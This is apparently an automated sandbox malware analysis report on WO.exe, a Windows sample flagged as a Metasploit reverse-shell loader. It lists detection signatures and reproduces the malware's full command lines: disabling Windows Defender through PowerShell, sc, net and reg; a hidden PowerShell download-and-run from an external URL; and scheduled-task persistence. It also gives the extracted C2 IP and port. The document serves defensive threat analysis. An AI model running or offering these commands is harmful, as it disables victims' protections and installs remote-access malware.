
Windows Analysis Report
WO.exe

Overview

General Information

Sample name: WO.exe
Analysis ID: 1580052
MD5: 7176b040816932541eb9c2b91d90b29b
SHA1: 137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256: db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
Tags: exe, user-James_inthe_box

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
Disable Windows Defender real time protection (registry)
Disables Windows Defender (via service or powershell)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Windows Service Tampering
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • WO.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\WO.exe" MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 7068 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2316 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 5480 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 1880 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6328 cmdline: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6276 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1544 cmdline: schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 2196 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 5244 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 2004 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 6184 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6352 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 2476 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 1836 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2004 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4476 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 2664 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 2472 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6972 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 6228 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 6992 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 3468 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 6152 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 4488 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 6272 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6324 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6104 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 7108 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 4076 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 6208 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1700 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • sc.exe (PID: 4476 cmdline: sc config WinDefend start= disabled MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 6176 cmdline: net stop WinDefend MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 6996 cmdline: C:\Windows\system32\net1 stop WinDefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • reg.exe (PID: 3312 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 2316 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • WO.exe (PID: 6156 cmdline: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe MD5: 7176B040816932541EB9C2B91D90B29B)
    • cmd.exe (PID: 4600 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6352 cmdline: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4996 cmdline: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • reddit.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\reddit.exe" MD5: 23544090C6D379E3ECA7343C4F05D4D2)
      • attrib.exe (PID: 6344 cmdline: attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • schtasks.exe (PID: 6416 cmdline: schtasks /query /TN "RunRedditLogon" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6944 cmdline: schtasks /query /TN "RunRedditMinute" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
Extracted malware configuration (Metasploit): {"Type": "Metasploit Connect", "IP": "147.185.221.23", "Port": 1121}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown
  • 0x4141:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\reddit.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
(table truncated: 2 entries)

Source | Rule | Description | Author | Strings
00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown
  • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown
  • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
(table truncated: 23 entries)

Source | Rule | Description | Author | Strings
53.0.reddit.exe.400000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
53.0.reddit.exe.400000.0.unpack | JoeSecurity_MetasploitPayload | Yara detected Metasploit Payload | Joe Security
53.0.reddit.exe.400000.0.unpack | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown
  • 0x3a39:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
28.2.reddit.exe.400000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
28.2.reddit.exe.400000.0.unpack | JoeSecurity_MetasploitPayload | Yara detected Metasploit Payload | Joe Security
(table truncated: 19 entries)

Source | Rule | Description | Author | Strings
amsi64_2316.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_6104.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4476.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4996.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe
Source: Process started | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro | Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f, ProcessId: 6328, ProcessName: schtasks.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')", ProcessId: 2316, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) | Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true", ProcessId: 7164, ProcessName: powershell.exe
Source: Process started | Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: net stop WinDefend, CommandLine: net stop WinDefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: net stop WinDefend, ProcessId: 5244, ProcessName: net.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T19:54:05.154586+0100 | 2820208 | 1 | A Network Trojan was detected | 185.151.51.214 | 443 | 192.168.2.4 | 49730 | TCP

AV Detection

Source: https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Avira: detection malicious, Label: TR/Patched.Gen2
Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "147.185.221.23", "Port": 1121}
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | ReversingLabs: Detection: 57%
Source: WO.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Joe Sandbox ML: detected
Source: WO.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 185.151.51.214:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb | source: reddit.exe.5.dr
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.tmp
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\Local\Temp\4782.tmp
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\WO.exe | File opened: C:\Users\user\
